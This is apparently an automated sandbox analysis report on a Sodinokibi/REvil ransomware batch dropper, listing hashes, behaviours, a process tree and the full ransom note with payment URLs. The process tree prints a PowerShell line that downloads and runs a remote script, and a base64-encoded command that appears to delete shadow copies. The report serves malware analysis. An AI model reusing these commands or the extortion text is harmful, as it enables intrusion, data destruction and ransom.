Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    25-03-2020 12:10

General

  • Target

    Gwbr3aud.bat

  • Size

    189B

  • MD5

    bedcf382904ffd9d90787b2dd3ad81a2

  • SHA1

    56128ffdde214dd351e2f1c0be362a632d065aa7

  • SHA256

    051c9112f4294354c647723d8645889eaf36dc198a7e28fbe2f6e229da623a00

  • SHA512

    e52d5ce4f80d49034e5429e2c0ebec13e8a9c10b467c3368b1042136f810098cb1ea4d238230c82082025c20c8f54ed69dcbe99df5048d03d95af103100a0a3b

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/Gwbr3aud

Extracted

Path

C:\q2p91h1cnh-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension q2p91h1cnh. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5127E8D3A8777106 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5127E8D3A8777106 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: M0bmlTfJo//n8ZN36d4bD2d8S38OAKyCnRJBtQSQQfeVkr9wCmbxxKnfDA7cR3z2 w9hu+khivGfNUEuzB+yLg5nzVKJKZgVbdri4CPRCF+qWa1AcIw1m2oZWOv4gRmX5 uDzM10Wm/iMn0mWL1pS3qQ2gLBivv5inMLyYTnrFvWCXs9mGKoTRSACIOzxswmms 0L2ZgHprCwIpIXjEpsHW96GI/jh/avTygLsSf2gmy9MmZIkfvqgF1eVVMMBpMrUz Gog4HMGEZ6SVjCz7pyVVT3xAVrpFtT5jso7HtaCDc1YZY5cjXnomkjdRARHVssQ3 CQhLZY+SV1k+VoUeBwZxzTnCdvM4x7NjHA5K/r/Xx0e3t0VdLuISXUr02B81fyV5 oCMyW/M4s9FM80eiBhGb9LWL+kdjkVr+jo6754u4UeM6SAnpZZwmHF3cgImR21GY kC09vjVbjzvG6DFWtAleJzEXmsclIU9u64kBofehCCnjsiJOctWpfDkSoZrQrogg P+Vn5kt+MGoOQH57X0szQXJtLQI7H+m7AxGoiH9eZ5Vp2TU5k5BhShv2bSJZuWwS 4JBMwUMBNc4rNGju3XxC/7myMyXW/xL9kIDkFRwCsw42FDNA0Cw+9FMDy1+/9OwV tzW7bdV3+eeMB+/Jj4QYzp1XGm3T3I6oyUljWbNkAoxRFfI7t1c1ecra2OywwhCr vlB1Cp6d/9AilbuQaK/t8mTiktEQaa3c8woUxwMr15rtAMbOThJWKRsmZhyXPouR /CC/K+4EwLSCzRnilTySsjOpBkDU/e0eJh3/pCYahEmQ3zF57AxEHZF6Jo8jxQEo 2jlgIfDW7h939/Dsfd2h6J8ryHMUo2GNHXK4XGfm2at9R2YERlGOvS5lOXm9fDTX l5pVdVTxzxk7UC44N3ZT5VvnfSQqPoLO/S/F0IuIdEAnY/5ayjxYwXy6UyUpFzcT Ryk0UR0XHL7dz0/bNnEXpVVuhhgImwyQ7c7dhIriibZ2N2q8DMs9nnyhgd0i89dC +TWXAMzmGSPjL5kmO4IN/IZClYsdJMvkAZugKDC9BlZyQxKFy1MG+OLk/QWWUBfk o5LS39FITfoaTA9qI+7u/oQAHDZrKryu40660cdCIgkcyH/YrVEwtowYGWVU5ZS0 pEESaFKCpodfoySK+EV62xjsln2ugZANIirbfUJ9sKkVJts7yNjENYs9zjOaiav7 6ES0HoT1nAj7ZXK7W4JStcBuBljNsapQdIs7e5thNToXZfv79L38ZulaQowg5B5Z Iv2eRUnwr83OVFI1zq7SYOYe+XR9pxgo9vNJWF5KiZw1W+d01tg= Extension name: q2p91h1cnh ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5127E8D3A8777106

http://decryptor.cc/5127E8D3A8777106

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 85 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Gwbr3aud.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1868
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Gwbr3aud');Invoke-BQBBOZ;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Discovering connected drives
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Modifies system certificate store
      PID:1892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1992
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:292

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms